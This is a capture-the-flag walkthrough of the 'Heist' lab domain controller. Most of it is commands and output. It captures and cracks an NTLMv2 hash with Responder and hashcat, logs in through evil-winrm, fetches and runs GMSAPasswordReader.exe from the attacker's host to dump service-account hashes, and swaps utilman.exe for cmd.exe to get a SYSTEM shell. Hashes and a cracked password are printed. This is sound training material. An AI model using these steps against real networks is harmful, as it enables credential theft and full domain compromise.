Heist

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.199.165
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 16:31 +08
Nmap scan report for 192.168.199.165
Host is up (0.013s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-03 08:31:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2024-03-22T06:03:39
|_Not valid after:  2024-09-21T06:03:39
|_ssl-date: 2024-06-03T08:32:53+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HEIST
|   NetBIOS_Domain_Name: HEIST
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: heist.offsec
|   DNS_Computer_Name: DC01.heist.offsec
|   DNS_Tree_Name: heist.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-03T08:32:13+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-title: Super Secure Web Browser
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-06-03T08:32:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.62 seconds

Initial Access

Domain Name: heist.offsec

Server Name: DC01

Enum4linux

Anonymous

$ enum4linux -a 192.168.199.165
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun  3 16:35:27 2024

 =========================================( Target Information )=========================================

Target ........... 192.168.199.165
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on 192.168.199.165 )==========================


[E] Can't find workgroup/domain



 ==============================( Nbtstat Information for 192.168.199.165 )==============================

Looking up status of 192.168.199.165
No reply from 192.168.199.165

 ==================================( Session Check on 192.168.199.165 )==================================


[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

Guest

$ enum4linux -a -u 'guest' -p '' 192.168.199.165
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun  3 16:36:34 2024

 =========================================( Target Information )=========================================

Target ........... 192.168.199.165
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on 192.168.199.165 )==========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't find workgroup/domain                                                                                                                                                                                   
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

 ==============================( Nbtstat Information for 192.168.199.165 )==============================
                                                                                                                                                                                                                  
Looking up status of 192.168.199.165                                                                                                                                                                              
No reply from 192.168.199.165

 ==================================( Session Check on 192.168.199.165 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Server doesn't allow session using username 'guest', password ''.  Aborting remainder of tests.

Port 8080

There is a website that is running on port 8080.

If we key in our own IP address, we can see that the website will display what is shown on that URL.

Getting NTLMv2 Hash

However, after trying multiple possible webshell (php, asp, aspx), it does not seems it is running on any of these platform. So the next step is trying to see if we can get a hash when we use responder.

$ sudo responder -I tun0                    
[sudo] password for ranay: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
....
[HTTP] NTLMv2 Client   : 192.168.199.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash     : enox::HEIST:c754c86a10fb2b2e:168AB5BF012EF0816AA365676511FBA6:0101000000000000E1635BE092B5DA01B9DF98F8667E5C2600000000020008004B0050005300340001001E00570049004E002D0059005700410052004A0039004900580057004C003900040014004B005000530034002E004C004F00430041004C0003003400570049004E002D0059005700410052004A0039004900580057004C0039002E004B005000530034002E004C004F00430041004C00050014004B005000530034002E004C004F00430041004C00080030003000000000000000000000000030000003C871E315B08F3D0B7DFAFEBB99708690E3368808ADAA080B07C99914FB52C40A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100380038000000000000000000

We are able to get the NTLMv2 Hash of enox.

We can try to crack the hash using hashcat.

$ echo 'enox::HEIST:c754c86a10fb2b2e:168AB5BF012EF0816AA365676511FBA6:0101000000000000E1635BE092B5DA01B9DF98F8667E5C2600000000020008004B0050005300340001001E00570049004E002D0059005700410052004A0039004900580057004C003900040014004B005000530034002E004C004F00430041004C0003003400570049004E002D0059005700410052004A0039004900580057004C0039002E004B005000530034002E004C004F00430041004C00050014004B005000530034002E004C004F00430041004C00080030003000000000000000000000000030000003C871E315B08F3D0B7DFAFEBB99708690E3368808ADAA080B07C99914FB52C40A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100380038000000000000000000' > hash
                                                                                                                                                                                                                  
$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force 
hashcat (v6.2.6) starting
...
ENOX::HEIST:c754c86a10fb2b2e:168ab5bf012ef0816aa365676511fba6:0101000000000000e1635be092b5da01b9df98f8667e5c2600000000020008004b0050005300340001001e00570049004e002d0059005700410052004a0039004900580057004c003900040014004b005000530034002e004c004f00430041004c0003003400570049004e002d0059005700410052004a0039004900580057004c0039002e004b005000530034002e004c004f00430041004c00050014004b005000530034002e004c004f00430041004c00080030003000000000000000000000000030000003c871e315b08f3d0b7dfafebb99708690e3368808adaa080b07c99914fb52c40a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340035002e003100380038000000000000000000:california
...

So the password for enox is california.

Logging in using evil-winrm

However, if we tried to login using RDP, we are not allowed.

$ xfreerdp /cert-ignore /d:heist /u:enox /p:'california' /v:192.168.199.165 /drive:shares,/home/ranay/Desktop/OSCP/shares
[17:02:23:547] [241477:241478] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:02:23:547] [241477:241478] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:02:24:894] [241477:241478] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:02:24:894] [241477:241478] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:02:24:894] [241477:241478] [ERROR][com.freerdp.core] - freerdp_post_connect failed

Furthermore, when we check the shares using smb, we are returned with nothing special

$ sudo crackmapexec smb 192.168.199.165 -u enox -p 'california' --shares
SMB         192.168.199.165 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:heist.offsec) (signing:True) (SMBv1:False)
SMB         192.168.199.165 445    DC01             [+] heist.offsec\enox:california 
SMB         192.168.199.165 445    DC01             [+] Enumerated shares
SMB         192.168.199.165 445    DC01             Share           Permissions     Remark
SMB         192.168.199.165 445    DC01             -----           -----------     ------
SMB         192.168.199.165 445    DC01             ADMIN$                          Remote Admin
SMB         192.168.199.165 445    DC01             C$                              Default share
SMB         192.168.199.165 445    DC01             IPC$            READ            Remote IPC
SMB         192.168.199.165 445    DC01             NETLOGON        READ            Logon server share 
SMB         192.168.199.165 445    DC01             SYSVOL          READ            Logon server share

But, when we checking using winrm, crackmapexec showed that this account is pwned. This means we are able to login using evil-winrm.

Lateral Movement

ReadGMSAPassword

After running sharphound on the target machine and extracting the zip into bloodhound. We can see that Enox is a member of Web Admins which have the rights to ReadGMSAPassword of SVC_APACHE$ user.

This is similar to one of the boxes we did previously (ReadGMSAPassword). We can try to follow the same steps.

Firstly, we need to add the DC's ip to host files

$ echo "192.168.199.165 heist.offsec" | sudo tee -a /etc/hosts
[sudo] password for ranay: 
192.168.199.165 heist.offsec

Next, we will download the github repository.

GitHub - micahvandeusen/gMSADumper: Lists who can read any gMSA password blobs and parses them if the current user has access.GitHub

$ git clone https://github.com/micahvandeusen/gMSADumper.git
Cloning into 'gMSADumper'...
remote: Enumerating objects: 54, done.
remote: Counting objects: 100% (54/54), done.
remote: Compressing objects: 100% (38/38), done.
remote: Total 54 (delta 22), reused 37 (delta 14), pack-reused 0
Receiving objects: 100% (54/54), 38.20 KiB | 3.47 MiB/s, done.
Resolving deltas: 100% (22/22), done.

However, if we tried running with this tool, we will encount this problem.

$ python gMSADumper.py -u enox -p california -l 192.168.199.165 -d heist.offsec
Unable to start a TLS connection. Is LDAPS enabled? Only ACLs will be listed and not ms-DS-ManagedPassword.

Users or groups who can read password for svc_apache$:
 > DC01$
 > Web Admins

This means that without LDAPS, this tool will not work as intended. So we need to find another tool to use.

GitHub - expl0itabl3/Toolies: Ad hoc collection of Red Teaming & Active Directory tooling.GitHub

From this github repo, there is a GMSAPasswordReader.exe which we can use to get the NTLM hash.

When we run it, we will get the NTLM Hash for svc_apache$.

*Evil-WinRM* PS C:\Users\enox\Documents> iwr -uri http://192.168.45.245/GMSAPasswordReader.exe -Outfile GMSAPasswordReader.exe
*Evil-WinRM* PS C:\Users\enox\Documents> ./GMSAPasswordReader.exe --AccountName svc_apache$
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : DA55A6102C791A052798C4B7EF6C0122
[*]       aes128_cts_hmac_sha1 : DCDE26BFBC9DF8915B7596B53D7D68C6
[*]       aes256_cts_hmac_sha1 : 233516DD90F498594EAC626E2FCA92504ABB675B34ED7D5E025D1897077CAFBD
[*]       des_cbc_md5          : 73F4133E1F385B68

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : A266E0F8D19F9CDB92AD8C658F86AFFA
[*]       aes128_cts_hmac_sha1 : 50B54BE046548576B96FFF5B97C8C733
[*]       aes256_cts_hmac_sha1 : 0BFA50E65DF92D77DC37018814AB1AB835FDF5EBE7AE3867FB49F387BB477322
[*]       des_cbc_md5          : 70D5527CA470D380

Privilege Escalation

SeRestorePrivilege

When we are in the svc_apache$ user, we can see that the user have this file

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> dir


    Directory: C:\Users\svc_apache$\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2021   8:27 AM           3213 EnableSeRestorePrivilege.ps1

After we run it, when we check our privilege, we have the SeRestorePrivilege enabled on our account.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

After searching online about what this privilege do, we can see that it give permission to write access to any system file

Abusing Tokens - HackTricksbook.hacktricks.xyz

After searching more, we can use this method to do Privilege escation

Windows - Privilege Escalation - Internal All The Thingsswisskyrepo.github.io

We will first overwrite utilman.exe to cmd.exe. This will ensure when we press Win+U when we are on the login page, we are able to get shell as administrator.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> cd C:\Windows\System32
*Evil-WinRM* PS C:\Windows\System32> move utilman.exe utilman.old
*Evil-WinRM* PS C:\Windows\System32> copy cmd.exe utilman.exe
*Evil-WinRM* PS C:\Windows\System32> move cmd.exe utilman.exe

We will just RDP into the machine.

$ rdesktop -d heist.offsec -u enox -p california 192.168.231.165

From here we do not need to login and by pressing Win+U we are able to get shell as NT Authority\System.

PreviousCraft2 NextHutch

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagEnum4linux

hashtagAnonymous

hashtagGuest

hashtagPort 8080

hashtagGetting NTLMv2 Hash

hashtagLogging in using evil-winrm

hashtagLateral Movement

hashtagReadGMSAPassword

hashtagPrivilege Escalation

hashtagSeRestorePrivilege